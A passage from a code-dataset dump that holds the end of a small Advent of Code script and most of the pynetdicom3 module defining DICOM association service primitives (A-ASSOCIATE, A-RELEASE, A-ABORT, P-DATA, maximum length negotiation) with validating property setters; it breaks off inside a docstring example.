int(\"\".join(epsilon), base=2)\n\nprint(gamma * epsilon)\n","repo_name":"gotche/advent_of_code","sub_path":"03/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8213600371","text":"\"\"\"\nImplementaion of the service parameter primitives.\n\"\"\"\nimport codecs\nimport logging\n\nfrom pydicom.uid import UID\n\nfrom pynetdicom3.pdu import (MaximumLengthSubItem,\n ImplementationClassUIDSubItem,\n ImplementationVersionNameSubItem,\n AsynchronousOperationsWindowSubItem,\n SCP_SCU_RoleSelectionSubItem,\n SOPClassExtendedNegotiationSubItem,\n SOPClassCommonExtendedNegotiationSubItem,\n UserIdentitySubItemRQ,\n UserIdentitySubItemAC)\nfrom pynetdicom3.utils import validate_ae_title, PresentationContext\n#from pynetdicom3.utils import pretty_bytes\n\nLOGGER = logging.getLogger('pynetdicom3.pdu_primitives')\n\n\nclass ServiceParameter(object):\n \"\"\" Base class for Service Parameters \"\"\"\n\n def __eq__(self, other):\n \"\"\"Equality of two ServiceParameters\"\"\"\n if isinstance(other, self.__class__):\n return other.__dict__ == self.__dict__\n\n return False\n\n def __ne__(self, other):\n \"\"\"Inequality of two ServiceParameters\"\"\"\n return not self == other\n\n def from_primitive(self):\n \"\"\"FIXME\"\"\"\n raise NotImplementedError\n\n def FromParams(self):\n \"\"\"FIXME\"\"\"\n return self.from_primitive()\n\n\n# Association Service primitives\nclass A_ASSOCIATE(object):\n \"\"\"\n A-ASSOCIATE Parameters\n\n The establishment of an association between two AEs shall be performed\n through ACSE A-ASSOCIATE request, indication, response and confirmation\n primitives.\n\n The initiator of the service is called the Requestor and the user that\n receives the request is the Acceptor.\n\n See PS3.8 Section 7.1.1\n\n The A-ASSOCIATE primitive is used by the DUL provider to send/receive\n information about the association. It gets converted to \n A-ASSOCIATE-RQ, -AC, -RJ PDUs that are sent to the peer DUL provider and \n gets deconverted from -RQ, -AC, -RJ PDUs received from the peer.\n\n It may be better to simply extend this with methods for containing\n the -rq, -ac, -rj possibilities rather than creating a new\n AssociationInformation class, but it would require maintaining the instance\n across the request-accept/reject path\n\n -rq = no Result value\n -ac = Result of 0x00\n -rj = Result != 0x00\n\n ::\n\n Parameter Request Indication Response Confirmation\n app context name M M(=) M M(=)\n calling ae title M M(=) M M(=)\n called ae title M M(=) M M(=)\n user info M M(=) M M(=)\n result M M(=)\n source M\n diagnostic U C(=)\n calling pres add M M(=)\n called pres add M M(=)\n pres context list M M(=)\n pres list result M M(=)\n\n mode UF MF(=)\n resp ae title MF MF(=)\n resp pres add MF MF(=)\n pres and sess req UF UF(=) UF UF(=)\n\n U - User option\n UF - User option, fixed value\n C - Conditional (on user option)\n M - Mandatory\n MF - Mandatory, fixed value\n (=) - shall have same value as request or response\n\n\n The Requestor sends a request primitive to the local DICOM UL provider =>\n peer UL => indication primitive to Acceptor.\n\n Acceptor sends response primitive to peer UL => local UL => confirmation\n primitive to Requestor\n\n The DICOM UL providers communicate with UL users using service primitives\n The DICOM UL providers communicate with each other using PDUs over TCP/IP\n\n **Service Procedure**\n\n 1. An AE (DICOM UL service user) that desires the establish an association\n issues an A-ASSOCIATE request primitive to the DICOM UL service\n provider. The Requestor shall not issue any primitives except the\n A-ABORT request primitive until it receives an A-ASSOCIATE confirmation\n primitive.\n 2. The DICOM UL service provider issues an A-ASSOCIATE indication primitive\n to the called AE\n 3. The called AE shall accept or reject the association by sending an\n A-ASSOCIATE response primitive with an appropriate Result parameter. The\n DICOM UL service provider shall issue an A-ASSOCIATE confirmation\n primitive having the same Result parameter. The Result Source parameter\n shall be assigned \"UL service-user\"\n 4. If the Acceptor accepts the association, it is established and is\n available for use. DIMSE messages can now be exchanged.\n 5. If the Acceptor rejects the association, it shall not be established and\n is not available for use\n 6. If the DICOM UL service provider is not capable of supporting the\n requested association it shall return an A-ASSOCIATE confirmation\n primitive to the Requestor with an appropriate Result parameter\n (rejected). The Result Source parameter shall be assigned either\n UL service provider (ACSE) or UL service provider (Presentation).\n The indication primitive shall not be issued. The association shall not\n be established.\n 7. Either Requestor or Acceptor may disrupt the Service Procedure by issuing\n an A-ABORT request primitive. The remote AE receives an A-ABORT\n indication primitive. The association shall not be established\n\n Attributes\n ----------\n mode : str\n Fixed value of \"normal\"\n PS3.8 7.1.1.1, [UF, MF(=), -, -]\n application_context_name : pydicom.uid.UID, bytes or str\n The application context name proposed by the requestor. Acceptor returns\n either the same or a different name. Returned name specifies the\n application context used for the Association. See PS3.8 Annex A. The\n application context name shall be a valid UID or UID string and for\n version 3 of the DICOM Standard should be '1.2.840.10008.3.1.1.1'\n PS3.8 7.1.1.2, [M, M(=), M, M(=)]\n calling_ae_title : str or bytes\n Identifies the Requestor of the A-ASSOCIATE service. Must be a valid\n AE\n PS3.8 7.1.1.3, [M, M(=), M, M(=)]\n called_ae_title : str or bytes\n Identifies the intended Acceptor of the A-ASSOCIATE service. Must be a\n valid AE\n PS3.8 7.1.1.4, [M, M(=), M, M(=)]\n responding_ae_title : str or bytes\n Identifies the AE that contains the actual acceptor of the\n A-ASSOCIATE service. Shall always contain the same value as the\n Called AE Title of the A-ASSOCIATE indication\n PS3.8 7.1.1.5, [-, -, MF, MF(=)]\n user_information : list\n Used by Requestor and Acceptor to include AE user information. See\n PS3.8 Annex D and PS3.7 Annex D.3\n PS3.8 7.1.1.6, [M, M(=), M, M(=)]\n result : int\n Provided either by the Acceptor of the A-ASSOCIATE request, the UL\n service provider (ACSE related) or the UL service provider\n (Presentation related). Indicates the result of the A-ASSOCIATE\n service. Allowed values are:\n\n * 0: accepted\n * 1: rejected (permanent)\n * 2: rejected (transient)\n\n PS3.8 7.1.1.7, [-, -, M, M(=)]\n result_source : int\n Identifies the creating source of the Result and Diagnostic parameters\n Allowed values are:\n\n * 0: UL service-user\n * 1: UL service-provider (ACSE related function)\n * 2: UL service-provider (presentation related function)\n\n PS3.8 7.1.1.8, [-, -, -, M]\n diagnostic : int\n If the `result` parameter is 0 \"rejected (permanent)\" or 1 \"rejected\n (transient)\" then this supplies diagnostic information about the result.\n If `result_source` is 0 \"UL service-user\" then allowed values are:\n\n * 0: no reason given\n * 1: application context name not supported\n * 2: calling AE title not recognised\n * 3: called AE title not recognised\n\n If `result_source` is 1 \"UL service-provider (ACSE related function)\"\n then allowed values are:\n\n * 0: no reason given\n * 1: no common UL version\n\n If `result_source` is 2 \"UL service-provider (presentation related\n function)\" then allowed values are:\n\n * 0: no reason given\n * 1: temporary congestion\n * 2: local limit exceeded\n * 3: called presentation address unknown\n * 4: presentation protocol version not supported\n * 5: no presentation service access point available\n \n PS3.8 7.1.1.9, [-, -, U, C(=)]\n calling_presentation_address : str\n TCP/IP address of the Requestor\n PS3.8 7.1.1.10, [M, M(=), -, -]\n called_presentation_address : str\n TCP/IP address of the intended Acceptor\n PS3.8 7.1.1.11, [M, M(=), -, -]\n responding_presentation_address : str\n Shall always contain the same value as the Called Presentation Address\n PS3.8 7.1.1.12, [-, -, MF, MF(=)]\n presentation_context_definition_list : list\n List of one or more presentation contexts, with each item containing\n a presentation context ID, an Abstract Syntax and a list of one or\n more Transfer Syntax Names. Sent by the Requestor during\n request/indication\n PS3.8 7.1.1.13, [M, M(=), -, -]\n presentation_context_definition_results_list : list\n Used in response/confirmation to indicate acceptance or rejection of\n each presentation context definition.\n List of result values, with a one-to-one correspondence between each\n of the presentation contexts proposed in the Presentation Context\n Definition List parameter.\n The result values may be sent in any order and may be different than\n the order proposed.\n Only one Transfer Syntax per presentation context shall be agreed to\n PS3.8 7.1.1.14, [-, -, M, M(=)]\n presentation_requirements : str\n Fixed value of \"Presentation Kernel\"\n PS3.8 7.1.1.15, [UF, UF(=), UF, UF(=)]\n session_requirements : str\n Fixed value of \"\" (empty string)\n PS3.8 7.1.1.16, [UF, UF(=), UF, UF(=)]\n \"\"\"\n # pylint: disable=too-many-instance-attributes\n\n def __init__(self):\n self.application_context_name = None\n self.calling_ae_title = None\n self.called_ae_title = None\n self.user_information = []\n self.result = None\n self.result_source = None\n self.diagnostic = None\n self.calling_presentation_address = None\n self.called_presentation_address = None\n self.presentation_context_definition_list = []\n self.presentation_context_definition_results_list = []\n\n @property\n def mode(self):\n \"\"\"Return the Mode parameter.\"\"\"\n return \"normal\"\n\n @property\n def application_context_name(self):\n \"\"\"Return the Application Context Name parameter.\"\"\"\n return self._application_context_name\n\n @application_context_name.setter\n def application_context_name(self, value):\n \"\"\"Set the Application Context Name parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Application Context Name\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n raise TypeError(\"application_context_name must be a \"\n \"pydicom.uid.UID, str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"application_context_name is an invalid UID\")\n raise ValueError(\"application_context_name is an invalid UID\")\n\n self._application_context_name = value\n\n @property\n def calling_ae_title(self):\n \"\"\"Return the Calling AE Title parameter.\"\"\"\n return self._calling_ae_title\n\n @calling_ae_title.setter\n def calling_ae_title(self, value):\n \"\"\"Set the Calling AE Title parameter.\n\n Parameters\n ----------\n value : str or bytes\n The Calling AE Title as a string or bytes object. Cannot be an empty\n string and will be truncated to 16 characters long\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n\n if value is not None:\n self._calling_ae_title = validate_ae_title(value)\n else:\n self._calling_ae_title = None\n\n @property\n def called_ae_title(self):\n \"\"\"Return the Called AE Title parameter.\"\"\"\n return self._called_ae_title\n\n @called_ae_title.setter\n def called_ae_title(self, value):\n \"\"\"Set the Called AE Title parameter.\n\n Parameters\n ----------\n value : str or bytes\n The Called AE Title as a string or bytes object. Cannot be an empty\n string and will be truncated to 16 characters long\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n\n if value is not None:\n self._called_ae_title = validate_ae_title(value)\n else:\n self._called_ae_title = None\n\n @property\n def responding_ae_title(self):\n \"\"\"Return the Responding AE Title parameter.\"\"\"\n return self.called_ae_title\n\n @property\n def user_information(self):\n \"\"\"Return the User Information parameter.\"\"\"\n return self._user_information\n\n @user_information.setter\n def user_information(self, value_list):\n \"\"\"Set the A-ASSOCIATE primitive's User Information parameter.\n\n Parameters\n ----------\n value_list : list of pynetdicom3 user information class objects\n A list of user information objects, must contain at least\n MaximumLengthNegotiation and ImplementationClassUIDNotification\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n valid_usr_info_items = []\n\n if isinstance(value_list, list):\n # Iterate through the items and check they're an acceptable class\n for item in value_list:\n if item.__class__.__name__ in \\\n [\"MaximumLengthNegotiation\",\n \"ImplementationClassUIDNotification\",\n \"ImplementationVersionNameNotification\",\n \"AsynchronousOperationsWindowNegotiation\",\n \"SCP_SCU_RoleSelectionNegotiation\",\n \"SOPClassExtendedNegotiation\",\n \"SOPClassCommonExtendedNegotiation\",\n \"UserIdentityNegotiation\"]:\n valid_usr_info_items.append(item)\n else:\n LOGGER.info(\"Attempted to set \"\n \"A_ASSOCIATE.user_information to a list \"\n \"which includes an unsupported item\")\n else:\n LOGGER.error(\"A_ASSOCIATE.user_information must be a list\")\n raise TypeError(\"A_ASSOCIATE.user_information must be a list\")\n\n self._user_information = valid_usr_info_items\n\n @property\n def result(self):\n \"\"\"Return te Result parameter.\"\"\"\n return self._result\n\n @result.setter\n def result(self, value):\n \"\"\"Set the A-ASSOCIATE Service primitive's Result parameter.\n\n Parameters\n ----------\n value : str\n One of the following:\n * 0: accepted\n * 1: rejected (permanent)\n * 2: rejected (transient)\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [0, 1, 2]:\n LOGGER.error(\"A_ASSOCIATE.result set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.result value\")\n\n self._result = value\n\n @property\n def result_source(self):\n \"\"\"Return the Result Source parameter.\"\"\"\n return self._result_source\n\n @result_source.setter\n def result_source(self, value):\n \"\"\"Set the A-ASSOCIATE Service primitive's Result Source parameter.\n\n Parameters\n ----------\n value : int\n One of the following:\n * 1: UL service-user\n * 2: UL service-provider (ACSE related function)\n * 3: UL service-provider (presentation related function)\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [1, 2, 3]:\n LOGGER.error(\"A_ASSOCIATE.result_source set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.result_source value\")\n\n self._result_source = value\n\n @property\n def diagnostic(self):\n \"\"\"Return the Diagnostic parameter.\"\"\"\n return self._diagnostic\n\n @diagnostic.setter\n def diagnostic(self, value):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Diagnostic parameter\n\n Parameters\n ----------\n value : int\n If `result_source` is \"UL service-user\" then allowed values are:\n * 1: no reason given\n * 2: application context name not supported\n * 3: calling AE title not recognised\n * 7: called AE title not recognised\n If `result_source` is \"UL service-provider (ACSE related function)\"\n then allowed values are:\n * 1: no reason given\n * 2: protocol version not supported\"\n If `result_source` is \"UL service-provider (Presentation related\n function)\" then allowed values are:\n * 1: temporary congestion\n * 2: local limit exceeded\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [1, 2, 3, 7]:\n LOGGER.error(\"A_ASSOCIATE.diagnostic set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.diagnostic value\")\n\n self._diagnostic = value\n\n @property\n def calling_presentation_address(self):\n \"\"\"Return the Calling Presentation Address parameter.\"\"\"\n return self._calling_presentation_address\n\n @calling_presentation_address.setter\n def calling_presentation_address(self, value):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Calling Presentation\n Address parameter\n\n Parameters\n ----------\n value : (str, int) tuple\n A tuple containing a valid TCP/IP address string and the port number\n as an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, tuple):\n if len(value) == 2 and isinstance(value[0], str) \\\n and isinstance(value[1], int):\n self._calling_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.calling_presentation_address must \"\n \"be (str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.calling_presentation_address \"\n \"must be (str, int) tuple\")\n elif value is None:\n self._calling_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.calling_presentation_address must be \"\n \"(str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.calling_presentation_address must \"\n \"be (str, int) tuple\")\n\n @property\n def called_presentation_address(self):\n \"\"\"Return the Called Presentation Address parameter.\"\"\"\n return self._called_presentation_address\n\n @called_presentation_address.setter\n def called_presentation_address(self, value):\n \"\"\"Set the Called Presentation Address parameter.\n\n Parameters\n ----------\n value : (str, int) tuple\n A tuple containing a valid TCP/IP address string and the port number\n as an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, tuple):\n if len(value) == 2 and isinstance(value[0], str) \\\n and isinstance(value[1], int):\n self._called_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.called_presentation_address must \"\n \"be (str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.called_presentation_address \"\n \"must be (str, int) tuple\")\n elif value is None:\n self._called_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.called_presentation_address must be \"\n \"(str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.called_presentation_address must \"\n \"be (str, int) tuple\")\n\n @property\n def responding_presentation_address(self):\n \"\"\"Get the Responding Presentation Address parameter.\"\"\"\n return self.called_presentation_address\n\n @property\n def presentation_context_definition_list(self):\n \"\"\"Get the Presentation Context Definition List.\"\"\"\n return self._presentation_context_definition_list\n\n @presentation_context_definition_list.setter\n def presentation_context_definition_list(self, value_list):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Presentation Context Definition\n List parameter\n\n Parameters\n ----------\n value_list : list of pynetdicom3.utils.PresentationContext\n The Presentation Contexts proposed by the Association Requestor\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n valid_items = []\n for item in value_list:\n if isinstance(item, PresentationContext):\n valid_items.append(item)\n else:\n LOGGER.warning(\"Attempted to set \"\n \"A_ASSOCIATE.presentation_context_definition_list to \"\n \"a list which includes an invalid items\")\n\n self._presentation_context_definition_list = valid_items\n\n else:\n LOGGER.error(\"A_ASSOCIATE.presentation_context_definition_list \"\n \"must be a list\")\n raise TypeError(\"A_ASSOCIATE.presentation_context_definition_list \"\n \"must be a list\")\n\n @property\n def presentation_context_definition_results_list(self):\n \"\"\"Get the Presentation Context Definition Results List.\"\"\"\n return self._presentation_context_definition_results_list\n\n @presentation_context_definition_results_list.setter\n def presentation_context_definition_results_list(self, value_list):\n \"\"\"Set the Presentation Context Definition Results List parameter.\n\n Parameters\n ----------\n value_list : list of pynetdicom3.utils.PresentationContext\n The results of the Presentation Contexts proposal by the Association\n Requestor\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n valid_items = []\n for item in value_list:\n if isinstance(item, PresentationContext):\n valid_items.append(item)\n else:\n LOGGER.warning(\"Attempted to set A_ASSOCIATE.presentation\"\n \"_context_definition_results_list to a \"\n \"list which includes one or more invalid \"\n \"items.\")\n\n self._presentation_context_definition_results_list = valid_items\n\n else:\n LOGGER.error(\"A_ASSOCIATE.presentation_context_definition_\"\n \"results_list must be a list\")\n raise TypeError(\"A_ASSOCIATE.presentation_context_definition_\"\n \"results_list must be a list\")\n\n @property\n def presentation_requirements(self):\n \"\"\"Get the Presentation Kernel.\"\"\"\n return \"Presentation Kernel\"\n\n @property\n def session_requirements(self):\n \"\"\"Get the Session Requirements.\"\"\"\n return \"\"\n\n # Shortcut attributes for User Information items\n # Mandatory UI Items\n @property\n def maximum_length_received(self):\n \"\"\"Get the Maximum Length Received.\"\"\"\n for item in self.user_information:\n if isinstance(item, MaximumLengthNegotiation):\n return item.maximum_length_received\n\n return None\n\n @maximum_length_received.setter\n def maximum_length_received(self, value):\n \"\"\"Set the Maximum Length Received.\n\n If the A_ASSOCIATE.user_information list contains a\n MaximumLengthNegotiated item then set its maximum_length_received value.\n If not then add a MaximumLengthNegotiated item and set its\n maximum_length_received value.\n\n Parameters\n ----------\n value : int\n The maximum length of each P-DATA in bytes\n \"\"\"\n # Type and value checking for the maximum_length_received parameter is\n # done by the MaximumLengthNegotiated class\n\n # Check for a MaximumLengthNegotiation item\n found_item = False\n\n for item in self.user_information:\n if isinstance(item, MaximumLengthNegotiation):\n found_item = True\n item.maximum_length_received = value\n\n # No MaximumLengthNegotiated item found\n if not found_item:\n max_length = MaximumLengthNegotiation()\n max_length.maximum_length_received = value\n self.user_information.append(max_length)\n\n @property\n def implementation_class_uid(self):\n \"\"\"Return the Implementation Class UID.\"\"\"\n for item in self.user_information:\n if isinstance(item, ImplementationClassUIDNotification):\n if item.implementation_class_uid is None:\n LOGGER.error(\"Implementation Class UID has not been set\")\n raise ValueError(\"Implementation Class UID has not \"\n \"been set\")\n\n return item.implementation_class_uid\n\n LOGGER.error(\"Implementation Class UID has not been set\")\n raise ValueError(\"Implementation Class UID has not been set\")\n\n @implementation_class_uid.setter\n def implementation_class_uid(self, value):\n \"\"\"Set the Implementation Class UID.\n\n If the A_ASSOCIATE.user_information list contains an\n ImplementationClassUIDNotification item then set its\n implementation_class_uid value. If not then add a\n ImplementationClassUIDNotification item and set its\n implementation_class_uid value.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Implementation Class UID\n \"\"\"\n # Type and value checking for the implementation_class_uid parameter is\n # done by the ImplementationClassUIDNotification class\n\n # Check for a ImplementationClassUIDNegotiation item\n found_item = False\n for item in self.user_information:\n if isinstance(item, ImplementationClassUIDNotification):\n found_item = True\n item.implementation_class_uid = value\n\n # No ImplementationClassUIDNegotiation item found\n if not found_item:\n imp_uid = ImplementationClassUIDNotification()\n imp_uid.implementation_class_uid = value\n self.user_information.append(imp_uid)\n\n\nclass A_RELEASE(object):\n \"\"\"\n A-RELEASE Parameters\n\n The release of an association between two AEs shall be performed through\n ACSE A-RELEASE request, indication, response and confirmation primitives.\n The initiator of the service is called a Requestor and the service-user that\n receives the A-RELEASE indication is called the acceptor.\n\n Service Procedure\n\n 1. The user (Requestor) that desires to end the association issues an\n A-RELEASE request primitive. The Requestor shall not issue any other\n primitives other than A-ABORT until it receives an A-RELEASE confirmation\n primitive.\n 2. The DUL provider issues an A-RELEASE indication to the Acceptor. The\n Acceptor shall not issue any other primitives other than A-RELEASE response,\n A-ABORT request or P-DATA request.\n 3. To complete the release, the Acceptor replies using an A-RELEASE response\n primitive, with \"affirmative\" as the result parameter.\n 4. After the Acceptor issues the A-RELEASE response it shall not issue any\n more primitives.\n 5. The Requestor shall issue an A-RELEASE confirmation primitive always\n with an \"affirmative\" value for the Result parameter.\n 6. A user may disrupt the release by issuing an A-ABORT request.\n 7. A collision may occur when both users issue A-RELEASE requests\n simultaneously. In this situation both users receive an unexpect A-RELEASE\n indication primitive (instead of an A-RELEASE acceptance):\n\n a. The association requestor issues an A-RELEASE response primitive\n b. The association acceptor waits for an A-RELEASE confirmation\n primitive from its peer. When it receives one it issues an A-RELEASE\n response primitive\n c. The association requestor receives an A-RELEASE confirmation\n primitive.\n\n When both ACSE users have received an A-RELEASE confirmation primitive the\n association shall be released.\n\n Parameter Request Indication Response Confirmation\n reason UF UF(=) UF UF(=)\n user info NU NU(=) NU NU(=)\n result MF MF(=)\n\n UF - User option, fixed\n NU - Not used\n MF - Mandatory, fixed\n (=) - shall have same value as request or response\n\n See PS3.8 Section 7.2\n\n Attributes\n ----------\n reason : str\n Fixed value of \"normal\". Identifies the general level of urgency of the\n request\n PS3.8 7.2.1.1, [UF, UF(=), UF, UF(=)]\n result : str or None\n Must be None for request and indication, \"affirmative\" for response\n and confirmation\n PS3.8 7.2.1.2, [-, -, MF, MF(=)]\n \"\"\"\n\n def __init__(self):\n self.result = None\n\n @property\n def reason(self):\n \"\"\"Return the Reason parameter.\"\"\"\n return \"normal\"\n\n @property\n def result(self):\n \"\"\"Return the Result parameter.\"\"\"\n return self._result\n\n @result.setter\n def result(self, value):\n \"\"\"Set the Result parameter.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is not None and value != \"affirmative\":\n LOGGER.error(\"A_RELEASE.result must be None or 'affirmative'\")\n raise ValueError(\"A_RELEASE.result must be None or 'affirmative'\")\n\n self._result = value\n\n\nclass A_ABORT(object):\n \"\"\"A-ABORT Parameters\n\n See PS3.8 Section 7.3.1\n\n Attributes\n ----------\n abort_source : int\n Indicates the initiating source of the abort. Allowed values are:\n * 0: UL service-user\n * 2: UL service-provider\n\n PS3.8 7.3.1.1, [-, M, X, X]\n \"\"\"\n\n def __init__(self):\n self.abort_source = None\n\n @property\n def abort_source(self):\n \"\"\"Return the Abort Source.\"\"\"\n if self._abort_source is None:\n LOGGER.error(\"A_ABORT.abort_source parameter not set\")\n raise ValueError(\"A_ABORT.abort_source value not set\")\n\n return self._abort_source\n\n @abort_source.setter\n def abort_source(self, value):\n \"\"\"Set the Abort Source.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value in [0, 2]:\n self._abort_source = value\n elif value is None:\n self._abort_source = None\n else:\n LOGGER.error(\"Attempted to set A_ABORT.abort_source to an \"\n \"invalid value\")\n raise ValueError(\"Attempted to set A_ABORT.abort_source to an \"\n \"invalid value\")\n\n\nclass A_P_ABORT(object):\n \"\"\"A-P-ABORT Parameters.\n\n See PS3.8 Section 7.4.1\n\n Attributes\n ----------\n provider_reason : int\n Indicates the reason for the abort. Allowed values are:\n * 0: reason not specified\n * 1: unrecognised PDU\n * 2: unexpected PDU\n * 4: unrecognised PDU parameter\n * 5: unexpected PDU parameter\n * 6: invalid PDU parameter value\n\n PS3.8 7.3.1.1, [P, X, X, X]\n \"\"\"\n\n def __init__(self):\n self.provider_reason = None\n\n @property\n def provider_reason(self):\n \"\"\"Return the Provider Reason.\"\"\"\n if self._provider_reason is None:\n LOGGER.error(\"A_ABORT.provider_reason parameter not set\")\n raise ValueError(\"A_ABORT.provider_reason value not set\")\n\n return self._provider_reason\n\n @provider_reason.setter\n def provider_reason(self, value):\n \"\"\"Set the Provider Reason.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value in [0, 1, 2, 4, 5, 6]:\n self._provider_reason = value\n elif value is None:\n self._provider_reason = None\n else:\n LOGGER.error(\"Attempted to set A_ABORT.provider_reason to an \"\n \"invalid value\")\n raise ValueError(\"Attempted to set A_ABORT.provider_reason to an \"\n \"invalid value\")\n\n\nclass P_DATA(object):\n \"\"\"P-DATA Parameters.\n\n See PS3.8 Section 7.6.1\n\n Attributes\n ----------\n presentation_data_value_list : list of [int, bytes]\n Contains one or more Presentation Data Values (PDV), each consisting of\n a Presentation Context ID and User Data values. The User Data values are\n taken from the Abstract Syntax and encoded in the Transfer Syntax\n identified by the Presentation Context ID. Each item in the list is\n [Context ID, PDV Data]\n PS3.8 7.6.1, [M, M(=), x, x]\n \"\"\"\n\n def __init__(self):\n self.presentation_data_value_list = []\n\n @property\n def presentation_data_value_list(self):\n \"\"\"Return the Presentation Data Value List.\"\"\"\n return self._presentation_data_value_list\n\n @presentation_data_value_list.setter\n def presentation_data_value_list(self, value_list):\n \"\"\"Set the Presentation Data Value List.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n for pdv in value_list:\n if isinstance(pdv, list):\n if isinstance(pdv[0], int) and isinstance(pdv[1], bytes):\n pass\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [int, bytes]\")\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [ID, PDV]\")\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [int, bytes]\")\n\n self._presentation_data_value_list = value_list\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = 'P-DATA\\n'\n for pdv in self.presentation_data_value_list:\n s += ' Context ID: {0!s}\\n'.format(pdv[0])\n s += ' Value Length: {0!s} bytes\\n'.format(len(pdv[1]))\n header_byte = pdv[1][0]\n\n # Python 2 compatibility\n if isinstance(header_byte, str):\n header_byte = ord(header_byte)\n\n s += \" Message Control Header Byte: {:08b}\\n\".format(header_byte)\n\n # xxxxxx01 and xxxxxx011\n if header_byte & 1:\n # xxxxxx11\n if header_byte & 2:\n s += ' Command information, last fragment of the ' \\\n 'DIMSE message\\n'\n # xxxxxx01\n else:\n s += ' Command information, not the last fragment of ' \\\n 'the DIMSE message\\n'\n # xxxxxx00, xxxxxxx10\n else:\n # xxxxxx10\n if header_byte & 2 != 0:\n s += ' Dataset information, last fragment of the ' \\\n 'DIMSE message\\n'\n # xxxxxx00\n else:\n s += ' Dataset information, not the last fragment of ' \\\n 'the DIMSE message\\n'\n\n # Remaining data\n #s += pretty_bytes(pdv[1][1:], ' ', max_size=512)\n\n return s\n\n\n# User Information Negotiation primitives\nclass MaximumLengthNegotiation(ServiceParameter):\n \"\"\"Define the Maximum Length Negotiation primitive.\n\n The maximum length notification allows communicating AEs to limit the size\n of the data for each P-DATA indication. This notification is required for\n all DICOM v3.0 conforming implementations.\n\n This User Information item is required during Association negotiation and\n there must only be a single MaximumLengthNegotiation item\n\n PS3.7 Annex D.3.3.1 and PS3.8 Annex D.1\n\n Attributes\n ----------\n maximum_length_received : int\n The maximum length received value for the Maximum Length sub-item in\n bytes. A value of 0 indicates unlimited length (31682 bytes default).\n \"\"\"\n\n def __init__(self):\n self.maximum_length_received = 16382\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.MaximumLengthSubItem\n \"\"\"\n item = MaximumLengthSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def maximum_length_received(self):\n \"\"\"Return the Maximum Length Received.\"\"\"\n return self._maximum_length\n\n @maximum_length_received.setter\n def maximum_length_received(self, val):\n \"\"\"User defined Maximum Length to be used during an Association.\n\n Parameters\n ----------\n val : int\n The maximum length of each P-DATA in bytes, must be equal to or\n greater than 0. A value of 0 indicates an unlimited maximum length.\n\n Raises\n ------\n ValueError\n If `maximum_length_received` is negative\n TypeError\n If `maximum_length_received` is not an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(val, int):\n if val < 0:\n LOGGER.error('Maximum Length Received must be greater than 0')\n raise ValueError(\"Maximum Length Received must be greater \"\n \"than 0\")\n else:\n self._maximum_length = val\n else:\n LOGGER.error(\"Maximum Length Received must be numerical\")\n raise TypeError(\"Maximum Length Received must be numerical\")\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Maximum Length Negotiation\\n\"\n s += \" Maximum length received: {0:d} bytes\\n\".format(\n self.maximum_length_received)\n return s\n\n\nclass ImplementationClassUIDNotification(ServiceParameter):\n \"\"\"The Implementation Class UID Notification primitive.\n\n The implementation identification notification allows implementations of\n communicating AEs to identify each other at Association establishment time.\n It is intended to provider respective and non-ambiguous identification in\n the event of communication problems encountered between two nodes. This\n negotiation is required.\n\n Implementation identification relies on two pieces of information:\n - Implementation Class UID (required)\n - Implementation Version Name (optional)\n\n The Implementation Class UID is required during Association negotiation and\n there must only be a single ImplementationClassUID item\n\n PS3.7 Annex D.3.3.2\n\n Example\n -------\n impl_class_uid = ImplementationClassUID()\n impl_class_uid.implementation_class_uid = '1.1.2.2.3.3.4'\n\n usr_data_neg = []\n 